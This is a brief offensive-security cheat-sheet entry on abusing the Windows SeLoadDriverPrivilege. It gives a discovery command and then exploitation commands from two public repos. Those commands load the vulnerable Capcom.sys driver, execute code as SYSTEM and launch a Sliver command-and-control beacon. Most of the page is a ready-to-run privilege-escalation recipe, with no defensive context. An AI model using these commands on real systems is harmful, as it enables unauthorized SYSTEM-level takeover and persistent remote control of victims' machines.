👾 Overview

The SeLoadDriverPrivilege allows a user to load drivers and execute code as SYSTEM. This can be coupled with a malicious driver to arbitrarily execute payloads on a machine.

🔍 Discovery

Requires a user with SeLoadDriverPrivilege enabled on a Windows Machine.

whoami /priv

📌 Exploitation

Using k4sth4’s repo:

# Load malicious driver
.\eoploaddriver_x64.exe System\\CurrentControlSet\\dfserv C:\\Temp\\Capcom.sys
.\ExploitCapcom.exe LOAD C:\\Temp\\Capcom.sys
 
# Test Exploit
.\ExploitCapcom.exe EXPLOIT whoami
 
# Pop a sliver beacon
.\ExploitCapcom.exe EXPLOIT beacon.exe

Using JoshMorrison99’s repo:

# Load the malicious driver
.\LoadDriver.exe System\CurrentControlSet\MyService {C:\Users\Test\Capcom.sys}
 
# Pop a sliver beacon
.\ExploitCapcom.exe C:\full\path\to\beacon.exe

📝 Resources